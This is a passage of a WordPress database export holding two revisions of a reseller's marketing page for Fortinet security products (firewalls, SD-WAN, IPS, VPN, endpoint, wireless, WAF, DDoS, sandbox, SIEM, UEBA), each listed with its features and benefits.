security.\r\n<h3><strong>Features and Benefits</strong></h3>\r\n<ul>\r\n 	<li>\r\n<h5><strong>Hardware assisted encryption</strong></h5>\r\n</li>\r\n</ul>\r\nPrevent breaches and secure data in transit at a very high speed.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Scalable Security</strong></h5>\r\n</li>\r\n</ul>\r\nScalable security that is seamlessly integrated with routing.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Comprehensive data communications security</strong></h5>\r\n</li>\r\n</ul>\r\nProtects Application to Application, User to Users, User to Machine, Machine to Machine communication.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Diverse VPNs</strong></h5>\r\n</li>\r\n</ul>\r\nIPsec or SSL based diverse VPNs to offer flexible secure network choices.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Security Fabric Integration</strong></h5>\r\n</li>\r\n</ul>\r\nShare FortiTelemetry information across site-to-site tunnels with required confidentiality.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Unified Management</strong></h5>\r\n</li>\r\n</ul>\r\nSimplified, easy-to-manage, single pane of glass to manage large scale crypto VPNs, Routing and NGFW.\r\n\r\n&nbsp;\r\n<h4>5.Â <strong>Secure Web Gateway (SWG)</strong></h4>\r\nFortinet firewalls with Gateway Security protects enterprises against web attacks with URL filtering, visibility and control of encrypted web traffic via SSL inspection, and application of granular web application policies. Fortinet is the first and only gateway security vendor to earn Virus Bulletinâ€™s VBWeb certification for web filtering effectiveness.\r\n<h3><strong>Features and Benefits</strong></h3>\r\n<ul>\r\n 	<li>Feature-rich product that consolidates NGFW and SWG services.</li>\r\n 	<li>Powerful hardware that can perform SSL deep inspection.</li>\r\n 	<li>Anti-malware techniques updated with the latest threat intelligence.</li>\r\n 	<li>Reduce security teamâ€™s workload by providing a single pane of glass management for both NGFW and SWG.</li>\r\n 	<li>Effectively remove blind spots in encrypted traffic, without compromising on performance.</li>\r\n 	<li>Stay protected against the latest known and unknown internet-borne attacks.</li>\r\n</ul>\r\n&nbsp;\r\n<h4><strong>6.Â Management &amp; Reporting</strong></h4>\r\nSecurity teams globally are challenged by resource constraints, both in terms of the number of staff and raw security talent. Moreover, security teams are asked to do more, often in more complex networks and with growing numbers of alerts from multiple systems. Successful security teams allay these challenges by implementing three best practices. First, they simplify the way view management, combining operation NOC-style views with security-based SOC context. Second, they regularly measure and score their security effectiveness, enabling them anytime to answer how secure they are. Third, they demand deep integration so they can automate repetitive actions, especially across silos when possible.\r\n<h3><strong>Features and Benefits</strong></h3>\r\n<ul>\r\n 	<li>\r\n<h5><strong>Security Operationalized Visibility</strong></h5>\r\n</li>\r\n</ul>\r\nBig picture perspective allows you to see the forest through the tree.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Cross Silo Automation</strong></h5>\r\n</li>\r\n</ul>\r\nDeeper than mere integration, orchestrate workflow responses to triggered security events.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Simplified Management</strong></h5>\r\n</li>\r\n</ul>\r\nStreamline deployment and management, reducing task time and improving response time.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Rapid Detection</strong></h5>\r\n</li>\r\n</ul>\r\nConsolidate telemetry and alerts to uncover patterns and discover security insights.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Fortinet Fabric</strong></h5>\r\n</li>\r\n</ul>\r\nCentralized control over all of your Fortinet network assets.\r\n\r\n&nbsp;\r\n<h2>INFRASTRUCTURE PROTECTION</h2>\r\n<h4><strong>1. Endpoint Protection</strong></h4>\r\nEndpoints are frequently the target of initial compromise or attacks. FortiClient strengthens endpoint security through integrated visibility, control, and proactive defense. With the ability to discover, monitor, and assess endpoint risks, you can ensure endpoint compliance, mitigate risks, and reduce exposure. FortiClient proactively defends against advanced attacks. Its tight integration with the Security Fabric enables policy-based automation to contain threats and control outbreaks. FortiClient is compatible with Fabric-Ready partners to further strengthen enterprisesâ€™ security posture.\r\n<h3><strong>Features and Benefits</strong></h3>\r\n<ul>\r\n 	<li>\r\n<h5><strong>Broad endpoint visibility</strong></h5>\r\n</li>\r\n</ul>\r\nFortiClient Fabric Agent integrates endpoints into the Security Fabric and provides endpoint telemetry, including user identity, protection status, risk scores, unpatched vulnerabilities, security events, and more.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Proactive endpoint defense</strong></h5>\r\n</li>\r\n</ul>\r\nAnti-exploit, sandbox integration, and behavior and pattern-based malware detection proactively detect and block malware, malicious scripts, document-based, and other advanced attacks.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Automated threat containment</strong></h5>\r\n</li>\r\n</ul>\r\nIntegration with the Security Fabric enables automated response. Mitigate unpatched vulnerabilities, alert users, and quarantine risky or compromised endpoints to stem an outbreak.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Secure remote access</strong></h5>\r\n</li>\r\n</ul>\r\nReliable, simple, and secure remote access with built-in, always-on VPN, with the added security of two-factor authentication, plus single-sign-on capabilities.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Easy to deploy and manage</strong></h5>\r\n</li>\r\n</ul>\r\nEasy to deploy and manage Modular and light-weight endpoint agents are centrally managed with the Enterprise Manager Server (EMS). Fabric Agent is compatible with Fabric-Ready endpoint security solutions.\r\n\r\n&nbsp;\r\n<h4>2.Â <strong>Wireless</strong></h4>\r\nFortinet provides a full suite of Wi-Fi Access Point and WLAN Controller products as part of our Secure Access solution designed to address the unique requirements of every organization. For assistance choosing an AP, our AP Product selector can be found here. Configuration and control of your wireless environment can be done directly with a FortiGate or via our dedicated Wireless LAN controllers. Fortinet also offers FortiManager and FortiCloud as management solutions for the entire Fortinet security fabric. All Fortinetâ€™s wireless solutions integrate with our location analytics platform: FortiPresence. This enables real-time locationing and device tracking.\r\n<h3><strong>Features and Benefits</strong></h3>\r\n<ul>\r\n 	<li>\r\n<h5><strong>Security Fabric Integration</strong></h5>\r\n</li>\r\n</ul>\r\nIntegration with FortiGate firewalls extends your security fabric out to the edge of the network.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Superior density, scalability and mobilit</strong><strong>y</strong></h5>\r\n</li>\r\n</ul>\r\nHandle even the most complex RF environments.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Zero-touch deployment</strong></h5>\r\n</li>\r\n</ul>\r\nFast and simple deployment with no requirements for onsite tech support.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Simplified deployment and capacity expansion</strong></h5>\r\n</li>\r\n</ul>\r\nNo licenses to manage, just plug and go.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Free location and analytics</strong></h5>\r\n</li>\r\n</ul>\r\nWireless device locationing tools included with no additional licenses required.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Scalability from 1 to 10,000 APs</strong></h5>\r\n</li>\r\n</ul>\r\nA range of platforms for any sized deployment.\r\n\r\n&nbsp;\r\n<h4>3.Â <strong>Switching</strong></h4>\r\nLegacy Ethernet LANs face many challenges including exponential growth in devices and applications, increased throughput demands from wireless LANs, and complex security implementations. Rather than asking how to secure traditional Ethernet LANs, Fortinet takes a security centric approach offering Ethernet as an extension of the security infrastructure through FortiSwitch and FortiLink. FortiSwitch offers a broad portfolio of secure, simple, and scalable Ethernet switches for applications that range from desktop to data center.\r\n<h3><strong>Features and Benefits</strong></h3>\r\n<ul>\r\n 	<li>\r\n<h5><strong>Security Fabric Integration with FortiLink</strong></h5>\r\n</li>\r\n</ul>\r\nFortiGate management of FortiSwitch extends Security Fabric features to the Ethernet access layer.\r\n<ul>\r\n 	<li>\r\n<h5><strong>No Touch Provisioning and Management with FortiLink</strong></h5>\r\n</li>\r\n</ul>\r\nAuto discovery, Global VLAN and Security Policies, Firewall interfaces and Ethernet ports equally secure.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Highly Scalable</strong></h5>\r\n</li>\r\n</ul>\r\nBroad portfolio of stackable 1, 10, and 40 GE access ports with up to 100 GE uplinks to scale from desktop to datacenter.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Unparalleled Visibility</strong></h5>\r\n</li>\r\n</ul>\r\nSingle pane of glass management of both Security and Network Access, Device detection and port visibility.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Enable voice, data, and wireless traffic across a single network</strong></h5>\r\n</li>\r\n</ul>\r\nPower network and IoT devices with POE, Auto provision using LLDP-MED.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Virtual Stacking</strong></h5>\r\n</li>\r\n</ul>\r\nFortiLink enables stacking across IDFs when managed, up to 300 switches based on FortiGate model.\r\n\r\n&nbsp;\r\n<h4>4.Â <strong>Email Security</strong></h4>\r\nEmail security remains a key productivity tool for today\'s organizations, as well as a successful attack vector for cyber criminals. FortiMail Email security utilizes the latest technologies and security services from FortiGuard Labs to deliver consistently top-rated protection from common and advanced threats while integrating robust data protection capabilities to avoid data loss.\r\n<h3><strong>Features and Benefits</strong></h3>\r\n<ul>\r\n 	<li>\r\n<h5><strong>Top-rated Antispam and Antiphishing</strong></h5>\r\n</li>\r\n</ul>\r\nMaintain productivity by shielding end users from unwanted spam and malicious phishing attacks.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Independently certified advanced threat defense</strong></h5>\r\n</li>\r\n</ul>\r\nThwart cyber criminals intent on stealing data, holding systems for ransomware, conducting fraud, and other malicious purposes.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Integrated data protection</strong></h5>\r\n</li>\r\n</ul>\r\nMaintain the privacy of personal information and confidentiality of sensitive data in compliance with regulatory and corporate guidelines.\r\n<ul>\r\n 	<li>\r\n<h5><strong>High-performance mail handling</strong></h5>\r\n</li>\r\n</ul>\r\nSpeed the delivery of legitimate email at an affordable cost.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Enterprise-class management</strong></h5>\r\n</li>\r\n</ul>\r\nFree staff and end users to drive the business by reducing time spent on email administration.\r\n\r\n&nbsp;\r\n<h2>APPLICATION SECURITY</h2>\r\n<ol>\r\n 	<li>\r\n<h4><strong>Web Application Firewall (WAF)</strong></h4>\r\n</li>\r\n</ol>\r\nUnprotected web applications are the easiest point of entry for hackers and vulnerable to a number of attack types. FortiWebâ€™s AI-enhanced and multi-layered approach protects your web apps from the OWASP Top 10 and more. When combined with our Web Application Security Service from FortiGuard Labs youâ€™re protected from the latest application vulnerabilities, bots, and suspicious URLs, and with dual machine learning detection engines your applications are safe from sophisticated threats such as SQL injection, cross-site scripting, buffer overflows, cookie poisoning, malicious sources, and DoS attacks.\r\n<h3><strong>Features and Benefits</strong></h3>\r\n<ul>\r\n 	<li>\r\n<h5><strong>Proven Web Application Protection</strong></h5>\r\n</li>\r\n</ul>\r\nFortiWeb protects against all the OWASP Top-10 threats, DDoS attacks and many others to defend your mission critical web-based applications.\r\n<ul>\r\n 	<li>\r\n<h5><strong>AI-based Threat Detection</strong></h5>\r\n</li>\r\n</ul>\r\nIn addition to regular signature updates and many other layers of defenses, FortiWebâ€™s AI-based, dual-layer machine learning engines protect against zero-day attacks.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Security Fabric Integration</strong></h5>\r\n</li>\r\n</ul>\r\nIntegration with FortiGate firewalls and FortiSandbox deliver protection from advanced persistent threats.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Hardware-based Acceleration</strong></h5>\r\n</li>\r\n</ul>\r\nFortiWeb delivers industry-leading protected WAF throughputs and blazing fast secure traffic encryption/decryption.\r\n<ul>\r\n 	<li>\r\n<h5><strong>False Positive Mitigation Tools</strong></h5>\r\n</li>\r\n</ul>\r\nAdvanced tools that minimize the day-to-day management of policies and exception lists to ensure only unwanted traffic is blocked.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Advanced Visual Analytics</strong></h5>\r\n</li>\r\n</ul>\r\nFortiWebâ€™s visual reporting tools provide detailed analyses of attack sources, types and other elements that provide insights not available with other WAF solutions.\r\n\r\n&nbsp;\r\n<h4>2.Â <strong>Application Delivery Controller</strong></h4>\r\nWith bandwidth demand growing faster than budgets and cyber-attacks constantly on the rise, it can be challenging to securely and efficiently deliver applications at the speed your users expect. Fortinet Application Delivery Controller (ADC) appliances optimize the availability, user experience, and scalability of enterprise application delivery. They enable fast, secure, and intelligent acceleration and distribution of even the most demanding enterprise applications.\r\n<h3><strong>Features and Benefits</strong></h3>\r\n<ul>\r\n 	<li>\r\n<h5><strong>Secure Traffic Management</strong></h5>\r\n</li>\r\n</ul>\r\nSSL offloading, forward proxy and visibility increase responsiveness and assist in scanning for threats.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Application Optimization</strong></h5>\r\n</li>\r\n</ul>\r\nSpeed web application delivery with compression, caching, HTTP 2.0, and HTTP Page Speed-UP.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Security Fabric Integration</strong></h5>\r\n</li>\r\n</ul>\r\nAV and Sandbox integration scans attachments to protect from the latest threats.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Global Server Load Balancing</strong></h5>\r\n</li>\r\n</ul>\r\nDistributes traffic across multiple geographical locations for disaster recovery.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Security Features</strong></h5>\r\n</li>\r\n</ul>\r\nWeb Application Firewall, Web Filtering, and IP Reputation for enhanced security.\r\n\r\n&nbsp;\r\n<h4>3.Â <strong>DDoS</strong></h4>\r\nDistributed Denial of Service (DDoS) attacks are ever-evolving and use a variety of technologies. To successfully combat these attacks, you need a dynamic, multi-layered security solution. FortiDDoS protects from both known and zero day attacks with very low latency. Itâ€™s easy to deploy and manage, and includes comprehensive reporting and analysis tools.\r\n<h3><strong>Features and Benefits</strong></h3>\r\n<ul>\r\n 	<li>100% security processor (SPU)-based layer 3, 4, and 7 DDoS protection application-aware traffic management.</li>\r\n 	<li>Ability to monitor hundreds of thousands of parameters simultaneously.</li>\r\n 	<li>Behavior-based DDoS protection to eliminate need for signature files.</li>\r\n 	<li>Minimal false-positive detections through continuous threat evaluation.</li>\r\n 	<li>Attack protection for DNS services via specialized tools.</li>\r\n 	<li>Defense against every DDoS attack: bulk volumetric, layer 7 application, and SSL/HTTPS.</li>\r\n</ul>\r\n&nbsp;\r\n<h2>THREAT DETECTION &amp; PREVENTION</h2>\r\n<h4><strong>Sandbox</strong></h4>\r\nWith the increasing volume and sophistication of cyber-attacks, it takes only one threat to slip through security for a data breach to occur. CISOs have adopted sandboxing as an essential component of their security strategies to help combat previously unknown threats. While attack surfaces are becoming more dynamic due to the rise of IoT and cloud-based services, a continuing shortage of cyber security talent is driving organizations to integrate sandboxing with greater controls and a high degree of automation.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li><strong>Broad integration</strong></li>\r\n</ul>\r\nExtends advanced threat protection to your next-generation firewall, web application firewall, secure email gateway, and endpoint protection platform.\r\n<ul>\r\n 	<li><strong>Intelligent automation</strong></li>\r\n</ul>\r\nSpeeds mitigation by sharing real-time updates to disrupt threats at the origin and subsequent immunization across the entire organization and the global community.\r\n<ul>\r\n 	<li><strong>All-in-one</strong></li>\r\n</ul>\r\nSimplifies deployment and reduces complexity by covering all protocols in a single common sandbox platform.\r\n<ul>\r\n 	<li><strong>Flexible deployment</strong></li>\r\n</ul>\r\nAvailable as a physical or virtual appliance on premises, as well as a cloud-based or managed service.\r\n<ul>\r\n 	<li><strong>Open extensibility</strong></li>\r\n</ul>\r\nFlexible APIs for easy third-party integration and available day-zero integration with Fabric-Ready partners.\r\n\r\n2.Â <strong>FortiSIEM</strong>\r\n\r\nSecurity management only gets more complex. Endpoints, IoT, Infrastructure, Security Tools, Applications, VMâ€™s and Cloud â€“ the number of things you need to secure and monitor grows constantly. FortiSIEM â€“ Fortinetâ€™s Multivendor Security Incident and Events Management solution brings it all together. Visibility, Correlation, Automated Response and Remediation in a single, scalable solution. Using a Business Services view, the complexity of managing network and security operations is reduced, freeing resources, improving breach detection. Worldwide 80% of breaches go undetected because of skills shortage and event information â€˜noiseâ€™. FortiSIEM provides the cross correlation, applies machine learning and UEBA to improve response, to stop breaches before they occur.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li>\r\n<h5><strong>Asset Self-Discovery</strong></h5>\r\n</li>\r\n</ul>\r\nVisibility needs to be both comprehensive and granular â€“ understanding a devices contextual capabilities and vulnerabilities reduces false positives.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Rapid Integrations and Scalability</strong></h5>\r\n</li>\r\n</ul>\r\nNetwork aware and security tool agnostic operations and management get a real-time business view of availability, utilization and security posture.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Automated Workflow</strong></h5>\r\n</li>\r\n</ul>\r\nA leading SOAR (Security Orchestration and Automated Response engine) the FortiSIEM Remediation Library responds to threats with the security tools you have today, and will grow with your enterprise.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Unified Platform</strong></h5>\r\n</li>\r\n</ul>\r\nMulti-tenancy for role-based access to a unified platform. Of benefit to MSPâ€™s and Enterprise customers alike â€“ deliver services and reports to a customer or a report. Share actionable intelligence and deliver value without compromise.\r\n\r\n&nbsp;\r\n<h4>3.Â <strong>User and Entity Behavior Analytics (UEBA)</strong></h4>\r\nFortinet User and Entity Behavior Analytics (UEBA) technology protects organizations from insider threats by continuously monitoring users and endpoints with automated detection and response capabilities. Leveraging machine learning and advanced analytics, Fortinet UEBA automatically identifies non-compliant, suspicious, or anomalous behavior and rapidly alerts any compromised user accounts. This proactive approach to threat detection delivers an additional layer of protection and visibility, whether users are on or off the corporate network.\r\n<h3><strong>Features and Benefits</strong></h3>\r\n<ul>\r\n 	<li>\r\n<h5><strong>Augmented Intelligence (AI)</strong></h5>\r\n</li>\r\n</ul>\r\nEnhanced data visibility with machine learning and UEBA to identify threats.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Rapid Threat Detection</strong></h5>\r\n</li>\r\n</ul>\r\nAI optimizes each stage of the threat investigation pipeline, shining a light on the unknown.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Regulatory Compliance Support</strong></h5>\r\n</li>\r\n</ul>\r\nSupport regulatory compliance with a dedicated reporting tool, to respond to and manage potential non-compliant activity.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Data Security</strong></h5>\r\n</li>\r\n</ul>\r\nMonitor data movement and endpoint activity 24/7 regardless of location or device, whether users are on or off your network.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Forensic-level Reporting</strong></h5>\r\n</li>\r\n</ul>\r\nCompile a full forensic history of user behavior, enabling thorough forensics investigation and detailed reporting.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Valuable Insights</strong></h5>\r\n</li>\r\n</ul>\r\nAnalyze data and deliver valuable insights, allowing your team to contain insider threats and respond in real time.\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\">[maxbutton id=\"1\" ]</p>','Fortinet','','inherit','closed','closed','','1474-revision-v1','','','2019-09-30 14:21:40','2019-09-30 06:21:40','',1474,'https://bintara.com.my/blog/2019/09/30/1474-revision-v1/',0,'revision','',0),(3564,1,'2019-09-30 14:24:22','2019-09-30 06:24:22','<strong style=\"font-size: 2em; color: #000;\">Fortinet</strong> provide top-rated network and content security, as well as secure access products that share intelligence and work together to form a cooperative fabric. Our uniqueÂ security fabricÂ combines Security Processors, an intuitive operating system, and applied threat intelligence to give you proven security, exceptional performance, and better visibility and control--while providing easier administration.\r\n\r\nFortiGate is available in a wide range of sizes and form factors to fit any environment and provides a broad array of next-generation security and networking functions. Complementary products can be deployed with a FortiGate to enable a simplified, end-to-end security infrastructure covering:\r\n<ul>\r\n 	<li>Network security</li>\r\n 	<li>Multi-Cloud security</li>\r\n 	<li>Web Application Security</li>\r\n 	<li>Email security</li>\r\n 	<li>Advanced Threat Protection</li>\r\n 	<li>Secure Unified Access</li>\r\n 	<li>Endpoint security</li>\r\n 	<li>Management and Analytics</li>\r\n</ul>\r\n&nbsp;\r\n<h2><strong>NETWORK SECURITY</strong></h2>\r\n<h4>1. Next Generation Firewall (NGFW)</h4>\r\nFortiGate enterprise firewalls offer flexible deployments from the network edge to the core, data center, internal segment, and the Cloud. FortiGate enterprise firewalls leverages purpose-built security processors (SPUs) that delivers scalable performance of advanced security services like Threat Protection, SSL inspection, and ultra-low latency for protecting internal segments and mission critical environments.\r\n<h5></h5>\r\n<h3><strong>Features and Benefits</strong></h3>\r\n<ul>\r\n 	<li>\r\n<h5><strong>High-performance threat protection</strong></h5>\r\n</li>\r\n</ul>\r\nIndustry\'s highest threat protection and SSL inspection performance to protect from malware attacks hiding in encrypted traffic.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Validated security effectiveness</strong></h5>\r\n</li>\r\n</ul>\r\nIndependently certified and continuous threat intelligence updates provide robust protection from known and unknown attacks.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Protect mission critical applications</strong></h5>\r\n</li>\r\n</ul>\r\nHighly scalable segmentation and ultra-low latency to protect network segments.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Continuous risk assessment via automation</strong></h5>\r\n</li>\r\n</ul>\r\nLeverage automated workflow and auditing features to deal with scarce security staff and continuously maintain compliance posture.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Security Fabric integration</strong></h5>\r\n</li>\r\n</ul>\r\nIntelligently share threats across the entire digital attack surface to provide quick and automated protection.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Enterprise class security management</strong></h5>\r\n</li>\r\n</ul>\r\nDeliver consistent security policy -- Single pane-of-glass to manage security assets irrespective of location and form factor.\r\n\r\n&nbsp;\r\n<h4>2.Â <strong>Secure SD-WAN</strong></h4>\r\nFortinet is the only NGFW vendor to provide native SD-WAN along with integrated advanced threat protection. Fortinet, has received the â€œRecommendedâ€ rating for the first ever test conducted by NSS Labs for Software-Defined Wide Area Networking. Fortinet delivered excellent quality of experience for voice and video, high VPN throughput and best price/performance. FortiGate SD-WAN replaces separate WAN routers, WAN optimization, and security devices with a single solution that is application-aware, offers automatic WAN path control and multi-broadband support. It improves application performance, reduces WAN Operating expenses and minimizes management complexity.\r\n<h3><strong>Features and Benefits</strong></h3>\r\n<ul>\r\n 	<li>Application aware solution, support a broad range of 3000+ applications as well as granular visibility into sub-applications.</li>\r\n 	<li>Path awareness intelligence to monitor application-level transactions, and dynamically failover to the best available path.</li>\r\n 	<li>Single-pane-of-glass management simplifies deployment, management and monitoring of SD-WAN devices.</li>\r\n 	<li>Reduced complexity and high total cost of ownership by using best of breed SD-WAN and NGFW functionality on a single appliance.</li>\r\n 	<li>Improve cloud application performance by prioritizing business critical applications and enabling branches to directly communicate to the internet.</li>\r\n 	<li>Reduce operating expenses by migrating from MPLS and utilizing multi-broadband such as Ethernet, DSL, and LTE.</li>\r\n</ul>\r\n&nbsp;\r\n<h4>3.Â <strong>IPS</strong></h4>\r\nWhether part of a firewall solution or a separate standalone appliance, Intrusion Prevention Systems (IPS) technology is becoming an increasingly ubiquitous part of network security defenses. Fortinet, well known for its next-generation firewall (NGFW) solution, has built IPS technology for more than ten years. Fortinet customers expect and depend on high performance from FortiGate firewalls and FortiGate IPS benefits from this legacy, delivering pound-for-pound, the best IPS performance available in the market today. FortiGate IPS, following a different evolution path than traditional IPS, innovates in ways that other standalone IPS products do not.\r\n<h3><strong>Features and Benefits</strong></h3>\r\n<ul>\r\n 	<li>\r\n<h5><strong>World-class Protection</strong></h5>\r\n</li>\r\n</ul>\r\nDeep inspection for advanced threats, botnets, zero days and targeted attacks on the network.\r\n<ul>\r\n 	<li>\r\n<h5><strong>High performance</strong></h5>\r\n</li>\r\n</ul>\r\nInnovative security processor (SPU) technology for high-performance network throughput and deep security inspection.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Advanced threat protection</strong></h5>\r\n</li>\r\n</ul>\r\nSeamless integration â€“ appliance or cloud service â€“ with world-class sandboxing for advanced threats.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Security Fabric integration</strong></h5>\r\n</li>\r\n</ul>\r\nIntegration and automation with Fortinetâ€™s broad product portfolio and partner ecosystem.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Data leak protection</strong></h5>\r\n</li>\r\n</ul>\r\nFile protection controls to prevent sensitive data exfiltration.\r\n\r\n&nbsp;\r\n<h4>4.Â <strong>Crypto VPNs</strong></h4>\r\nMaintaining uniform security policy for all corporate users, applications, devices irrespective of their location and appropriate access control is essential to providing security in a multi-cloud environment. The data in motion must be protected using mutual authentication and confidentiality to protect sensitive corporate data over unprotected networks and provides a defensible proof of security.\r\n<h3><strong>Features and Benefits</strong></h3>\r\n<ul>\r\n 	<li>\r\n<h5><strong>Hardware assisted encryption</strong></h5>\r\n</li>\r\n</ul>\r\nPrevent breaches and secure data in transit at a very high speed.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Scalable Security</strong></h5>\r\n</li>\r\n</ul>\r\nScalable security that is seamlessly integrated with routing.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Comprehensive data communications security</strong></h5>\r\n</li>\r\n</ul>\r\nProtects Application to Application, User to Users, User to Machine, Machine to Machine communication.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Diverse VPNs</strong></h5>\r\n</li>\r\n</ul>\r\nIPsec or SSL based diverse VPNs to offer flexible secure network choices.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Security Fabric Integration</strong></h5>\r\n</li>\r\n</ul>\r\nShare FortiTelemetry information across site-to-site tunnels with required confidentiality.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Unified Management</strong></h5>\r\n</li>\r\n</ul>\r\nSimplified, easy-to-manage, single pane of glass to manage large scale crypto VPNs, Routing and NGFW.\r\n\r\n&nbsp;\r\n<h4>5.Â <strong>Secure Web Gateway (SWG)</strong></h4>\r\nFortinet firewalls with Gateway Security protects enterprises against web attacks with URL filtering, visibility and control of encrypted web traffic via SSL inspection, and application of granular web application policies. Fortinet is the first and only gateway security vendor to earn Virus Bulletinâ€™s VBWeb certification for web filtering effectiveness.\r\n<h3><strong>Features and Benefits</strong></h3>\r\n<ul>\r\n 	<li>Feature-rich product that consolidates NGFW and SWG services.</li>\r\n 	<li>Powerful hardware that can perform SSL deep inspection.</li>\r\n 	<li>Anti-malware techniques updated with the latest threat intelligence.</li>\r\n 	<li>Reduce security teamâ€™s workload by providing a single pane of glass management for both NGFW and SWG.</li>\r\n 	<li>Effectively remove blind spots in encrypted traffic, without compromising on performance.</li>\r\n 	<li>Stay protected against the latest known and unknown internet-borne attacks.</li>\r\n</ul>\r\n&nbsp;\r\n<h4><strong>6.Â Management &amp; Reporting</strong></h4>\r\nSecurity teams globally are challenged by resource constraints, both in terms of the number of staff and raw security talent. Moreover, security teams are asked to do more, often in more complex networks and with growing numbers of alerts from multiple systems. Successful security teams allay these challenges by implementing three best practices. First, they simplify the way view management, combining operation NOC-style views with security-based SOC context. Second, they regularly measure and score their security effectiveness, enabling them anytime to answer how secure they are. Third, they demand deep integration so they can automate repetitive actions, especially across silos when possible.\r\n<h3><strong>Features and Benefits</strong></h3>\r\n<ul>\r\n 	<li>\r\n<h5><strong>Security Operationalized Visibility</strong></h5>\r\n</li>\r\n</ul>\r\nBig picture perspective allows you to see the forest through the tree.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Cross Silo Automation</strong></h5>\r\n</li>\r\n</ul>\r\nDeeper than mere integration, orchestrate workflow responses to triggered security events.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Simplified Management</strong></h5>\r\n</li>\r\n</ul>\r\nStreamline deployment and management, reducing task time and improving response time.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Rapid Detection</strong></h5>\r\n</li>\r\n</ul>\r\nConsolidate telemetry and alerts to uncover patterns and discover security insights.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Fortinet Fabric</strong></h5>\r\n</li>\r\n</ul>\r\nCentralized control over all of your Fortinet network assets.\r\n\r\n&nbsp;\r\n<h2>INFRASTRUCTURE PROTECTION</h2>\r\n<h4><strong>1. Endpoint Protection</strong></h4>\r\nEndpoints are frequently the target of initial compromise or attacks. FortiClient strengthens endpoint security through integrated visibility, control, and proactive defense. With the ability to discover, monitor, and assess endpoint risks, you can ensure endpoint compliance, mitigate risks, and reduce exposure. FortiClient proactively defends against advanced attacks. Its tight integration with the Security Fabric enables policy-based automation to contain threats and control outbreaks. FortiClient is compatible with Fabric-Ready partners to further strengthen enterprisesâ€™ security posture.\r\n<h3><strong>Features and Benefits</strong></h3>\r\n<ul>\r\n 	<li>\r\n<h5><strong>Broad endpoint visibility</strong></h5>\r\n</li>\r\n</ul>\r\nFortiClient Fabric Agent integrates endpoints into the Security Fabric and provides endpoint telemetry, including user identity, protection status, risk scores, unpatched vulnerabilities, security events, and more.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Proactive endpoint defense</strong></h5>\r\n</li>\r\n</ul>\r\nAnti-exploit, sandbox integration, and behavior and pattern-based malware detection proactively detect and block malware, malicious scripts, document-based, and other advanced attacks.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Automated threat containment</strong></h5>\r\n</li>\r\n</ul>\r\nIntegration with the Security Fabric enables automated response. Mitigate unpatched vulnerabilities, alert users, and quarantine risky or compromised endpoints to stem an outbreak.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Secure remote access</strong></h5>\r\n</li>\r\n</ul>\r\nReliable, simple, and secure remote access with built-in, always-on VPN, with the added security of two-factor authentication, plus single-sign-on capabilities.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Easy to deploy and manage</strong></h5>\r\n</li>\r\n</ul>\r\nEasy to deploy and manage Modular and light-weight endpoint agents are centrally managed with the Enterprise Manager Server (EMS). Fabric Agent is compatible with Fabric-Ready endpoint security solutions.\r\n\r\n&nbsp;\r\n<h4>2.Â <strong>Wireless</strong></h4>\r\nFortinet provides a full suite of Wi-Fi Access Point and WLAN Controller products as part of our Secure Access solution designed to address the unique requirements of every organization. For assistance choosing 